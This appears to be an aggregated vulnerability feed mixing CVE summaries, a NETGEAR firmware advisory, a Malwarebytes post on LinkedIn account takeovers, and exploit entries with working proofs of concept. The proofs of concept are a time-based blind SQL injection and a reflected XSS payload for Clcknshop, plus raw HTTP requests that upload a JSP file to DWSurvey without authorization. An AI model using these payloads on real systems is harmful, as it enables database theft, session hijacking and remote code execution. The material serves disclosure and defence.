Microsoft Windows Kernel renaming layered keys does not reference count security descriptors, leading to a use-after-free condition.

Microsoft Windows Kernel Use-After-Free

PlayTube version 3.0.1 suffers from an information leakage vulnerability.

    # Exploit Title: PlayTube 3.0.1 - Redirect Information Disclosure# Exploit Author: CraCkEr# Date: 19/08/2023# Vendor: PlayTube# Vendor Homepage: https://playtubescript.com/# Software Link: https://demo.playtubescript.com/# Tested on: Windows 10 Pro# Impact: Sensitive Information Leakage# CVE: CVE-2023-4714# CWE: CWE-200 - CWE-284 - CWE-266## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionInformation disclosure issue in the redirect responses, When accessing any page on the website,Sensitive data, such as app IDs, is being exposed in the body of these redirects.## Steps to Reproduce:When you visit most of pages on the website, such as the index page for example:https://website/in the body page response there's information leakage for "RazorPay Payment" id KEY+--------------------------------------+razorpay_options = {          key: "rzp_test_ruz***********"+--------------------------------------+Note: The same information leaked, for the app ID KEY, was added to the "Payment Configuration" in the Administration PanelSettings of "Payment Configuration" in the Administration Panel, on this Path:https://website/admin-cp/payment-settings[-] Done

PlayTube 3.0.1 Information Disclosure

Clcknshop version 1.0.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Clcknshop 1.0.0 - SQL Injection# Exploit Author: CraCkEr# Date: 16/08/2023# Vendor: Infosoftbd Solutions# Vendor Homepage: https://infosoftbd.com/# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/# Demo: https://kidszone.clckn.shop/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4708# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /collection/allGET parameter 'tag' is vulnerable to SQL Injectionhttps://website/collection/all?tag=[SQLi]---Parameter: tag (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z---[-] Done

Clcknshop 1.0.0 SQL Injection

Clcknshop version 1.0.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Clcknshop 1.0.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/08/2023# Vendor: Infosoftbd Solutions# Vendor Homepage: https://infosoftbd.com/# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/# Demo: https://kidszone.clckn.shop/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4707# CWE: CWE-79 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /collection/allGET parameter 'q' is vulnerable to XSShttps://website/collection/all?q=[XSS]XSS Payloads:jkhrt<script>alert(1)</script>ccnsi[-] Done

Clcknshop 1.0.0 Cross Site Scripting

File Upload vulnerability in DWSurvey DWSurvey-OSS v.3.2.0 and before allows a remote attacker to execute arbitrary code via the saveimage method and savveFile in the action/UploadAction.java file.

\`\`The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization

For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution

  
\`POST /diaowen/up/upload!saveimage.action HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0  
Connection: close  
Content-Length: 395  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde  
Accept-Encoding: gzip, deflate

\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"  
Content-Type: image/jpeg

testnixxx  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg  
\------WebKitFormBoundary12345abcde--  
\`  
  

Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution

  
\`POST /diaowen/up/upload!saveFile.action HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0  
Connection: close  
Content-Length: 489  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde  
Accept-Encoding: gzip, deflate

\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="basepath"

files  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"  
Content-Type: image/jpeg

testnixxx  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg  
\------WebKitFormBoundary12345abcde--  
\`

CVE-2023-40980: Arbitrary file uploads exist · Issue #107 · wkeyuan/DWSurvey

Buffer Overflow vulnerability in NETGEAR R6400v2 before version 1.0.4.118, allows remote unauthenticated attackers to execute arbitrary code via crafted URL to httpd.

Was this article helpful?   Yes     No

Associated CVE IDs: None

First published: 2023-03-15

NETGEAR has released fixes for a pre-authentication buffer overflow security vulnerability on the following product models:

*   CBR40 fixed in firmware version 2.5.0.24
*   LAX20 fixed in firmware version 1.1.6.34
*   MK62 fixed in firmware version 1.1.6.122
*   MR60 fixed in firmware version 1.1.6.122
*   MS60 fixed in firmware version 1.1.6.122
*   RBW30 fixed in firmware version 2.6.2.6
*   R6400 fixed in firmware version 1.0.1.70
*   R6400v2 fixed in firmware version 1.0.4.118
*   R6700v3 fixed in firmware version 1.0.4.118
*   R7000 fixed in firmware version 1.0.11.130
*   R7000P fixed in firmware version 1.3.3.148
*   RAX200 fixed in firmware version 1.0.4.120
*   RAX75 fixed in firmware version 1.0.4.120
*   RAX80 fixed in firmware version 1.0.4.120
*   RS400 fixed in firmware version 1.5.1.86

NETGEAR strongly recommends that you download the latest firmware as soon as possible.

**To download the latest firmware for your NETGEAR product:**

1.  Visit NETGEAR Support.
2.  Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears.  
    If you do not see a drop-down menu, make sure that you entered your model number correctly, or select a product category to browse for your product model.
3.  Click **Downloads**.
4.  Under **Current Versions**, select the download whose title begins with **Firmware Version**.
5.  Click **Download**.
6.  Follow the instructions in your product’s user manual, firmware release notes, or product support page to install the new firmware.

****Disclaimer****

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information in the document or materials linked from the document is at your own risk. NETGEAR reserves the right to change or update this document at any time. NETGEAR expects to update this document as new information becomes available.

The pre-authentication buffer overflow vulnerability remains if you do not complete all recommended steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification.

****Acknowledgements****

Swings from Chaitin Security Research Lab

****Common Vulnerability Scoring System****

CVSS Rating: Medium

CVSS Score: 6.5

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

****Best Practices for Updating Firmware****

We recommend that you keep your NETGEAR devices up to date with the latest firmware. Firmware updates contain security fixes, bug fixes, and new features for your NETGEAR products.

If your product is supported by one of our apps, using the app is the easiest way to update your firmware:

*   Orbi products: NETGEAR Orbi app
*   NETGEAR WiFi routers: NETGEAR Nighthawk app
*   Some NETGEAR Business products: NETGEAR Insight app (firmware updates through the app are available only for Insight subscribers)

If your product is not supported by one of our apps, you can always update your firmware manually by following the instructions in your product’s user manual, firmware release notes, or product support page. For more information, see Where can I find information about my NETGEAR product?.

****Contact****

We appreciate and value having security concerns brought to our attention. NETGEAR constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR.

It is NETGEAR's mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.

To report a security vulnerability, visit http://www.netgear.com/about/security/. 

If you are a NETGEAR customer with a security-related support concern, you can contact NETGEAR customer support at techsupport.security@netgear.com. 

****Revision History****

2023-03-15: Published advisory

2023-06-15: Updated Acknowledgements section

Last Updated:06/15/2023 | Article ID: 000065571

**Was this article helpful?**Yes No

**This article applies to:**

*   Wireless AX Router Nighthawk (WiFi 6) (3)
    *   RAX200
    *   RAX75
    *   RAX80
*   Nighthawk WiFi Systems (3)
    *   MK62
    *   MR60
    *   MS60
*   Wireless AC Router Nighthawk (4)
    *   R6700v3
    *   R7000
    *   R7000P
    *   RS400
*   Mobile Router (1)
    *   LAX20
*   Wireless AC Router (2)
    *   R6400
    *   R6400v2
*   Orbi (2)
    *   CBR40
    *   RBW30

How to Find Your Model Number  
**Read this article in another language:**

**Looking for more about your product?**

Get information, documentation, videos and more for your specific product.

**Need to Contact NETGEAR Support?**

With NETGEAR’s round-the-clock premium support, help is just a phone call away.

**Complimentary Support**

NETGEAR provides complimentary technical support for NETGEAR products for 90 days from the original date of purchase.

Contact Support

**NETGEAR Premium Support**

**GearHead Support for Home Users**

GearHead Support is a technical support service for NETGEAR devices and all other connected devices in your home. Advanced remote support tools are used to fix issues on any of your devices. The service includes support for the following:

*   Desktop and Notebook PCs, Wired and Wireless Routers, Modems, Printers, Scanners, Fax Machines, USB devices and Sound Cards
*   Windows Operating Systems (2000, XP or Vista), MS Word, Excel, PowerPoint, Outlook and Adobe Acrobat
*   Anti-virus and Anti-Spyware: McAfee, Norton, AVG, eTrust and BitDefender

Learn More

**ProSUPPORT Services for Business Users**

NETGEAR ProSUPPORT services are available to supplement your technical support and warranty entitlements. NETGEAR offers a variety of ProSUPPORT services that allow you to access NETGEAR's expertise in a way that best meets your needs:

*   Product Installation
*   Professional Wireless Site Survey
*   Defective Drive Retention (DDR) Service

Learn More

CVE-2023-36187: Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2020-0578

SQL Injection vulnerability in Chamilo LMS v.1.11 thru v.1.11.20 allows a remote privileged attacker to obtain sensitive information via the import sessions functions.

CVE-2023-39582: Security issues - Chamilo LMS

An authorization/sensitive information disclosure vulnerability was identified in GitHub Enterprise Server that allowed a fork to retain read access to an upstream repository after its visibility was changed to private. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.10.0 and was fixed in versions 3.9.4, 3.8.9, 3.7.16 and 3.6.18. This vulnerability was reported via the GitHub Bug Bounty program.


CVE-2023-23763: Release notes - GitHub Enterprise Server 3.6 Docs

Categories: News
Tags: LinkedIn

Tags:  sessions

Tags:  contacts

It started with a password reset email in the middle of the night.



(Read more...)




The post A firsthand perspective on the recent LinkedIn account takeover campaign appeared first on Malwarebytes Labs.

Posted: September 1, 2023 by

Not long ago I wrote about a recent campaign to hold LinkedIn users' accounts to ransom. Shortly after I published the article, a co-worker, Peace, reached out to me told me they'd been a target of the campaign.

His story begins with an SMS text from LinkedIn telling him to reset his password. He found this confusing: It arrived in the middle of the night, and he hadn't asked for a password reset. Since he doesn’t use the LinkedIn app on his mobile he checked his account on his laptop first thing in the morning. The current sessions (Profile Picture > Settings > Sign in & security > Where you’re signed in) showed an unknown IP address in Texas logged into his account.

Frustration #1: The promised “Sign out of all these sessions” option is nowhere to be found. I double checked in a browser session on Windows and in the app on Android. It’s not there.

Pearce then found out that there was at least one person in his Connections that he did not invite or accept an invitation from. This person also hails from Texas.

Pearce is a security professional so as soon as he was convinced there was someone else with access to his LinkedIn account, he took action.

A reset of the account’s password worked, but failed to remove the unwanted active session.

Pearce had already set up multi-factor authentication (MFA) on his account, but changed this from SMS to an authenticator app. As I stated in my previous blog, “Setting up MFA for LinkedIn with Okta turned out to be painful because LinkedIn does not provide a QR code but a secret key which is so long that it’s hard to get it right the first, or second time.”

But despite his troubles this didn’t remove the unwanted active session either.

Frustration #2: Changing security and sign in settings is a pain, but has no effect on currently logged in users on other devices.

Frustration #3: LinkedIn Support is overwhelmed and takes quite some time before you get actual help.

Pearce opened a support ticket with LinkedIn. As we mentioned before, the campaign appears to have completely overwhelmed LinkedIn Support. The LinkedIn Help account on X (formerly Twitter) has pinned a message to say:

> “Hey there! 👋 We're experiencing an uptick in questions from our members, causing longer reply times. Rest assured, we're doing our best to assist you! For account-specific inquiries, please DM us the details and your email address. We appreciate your patience. Thanks! 🙌”

It took them 3 to 4 days to reply with the following message:

> Status: Closed
> 
> ...
> 
> Hi Pearce,
> 
> Thanks for contacting us about this. To secure your account, we've taken the following actions:
> 
> 1.  We signed you out of your account from every computer or mobile device it has been accessed on. Note: This will now prompt a new login for your account.
> 2.  We sent a password reset link to the primary email address listed on your account.
> 
> There are a few scenarios that could explain the possibility of unauthorized access to a LinkedIn account:
> 
> *   If you've recently signed into your account from a public computer or a shared device at your workplace or home, and didn't completely sign out of your account, the next person to access the site on that device may have unintentionally signed in to your account.
> *   An email or phone number registered in your account is outdated and access to the email or phone number has been recycled or compromised.
> *   If the same password is used in multiple websites, this could have been compromised through unaffiliated sites or a phishing attack.
> *   We'd recommend these best practices for your online privacy:
> 
> *   Check the email addresses on your account to ensure they are current: https://www.linkedin.com/help/linkedin/answer/60
> *   Turn on two-step verification as an added layer of security: https://www.linkedin.com/help/linkedin/answer/544
> *   Find more tips here: https://www.linkedin.com/help/linkedin/answer/267
> 
> If you continue to see anything suspicious, please report it to us immediately.
> 
> Regards,
> 
> LinkedIn Member Safety and Recovery Consultant

Fortunately this worked and Pearce has regained control of his account. But this ordeal could have been much worse than with just a few added new connections. Had the account been taken over, it could have been used for malicious activities, damaging Pearce’s reputation in the process.

Note: LinkedIn has added an option to end individual sessions since this incident, but a few quick tests showed that this doesn’t always work as advertised. We may dive into that at a later point.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

**RELATED ARTICLES**

A firsthand perspective on the recent LinkedIn account takeover campaign

Sensitive information disclosure due to improper token expiration validation. The following products are affected: Acronis Agent (Windows) before build 32047.

Tag

#windows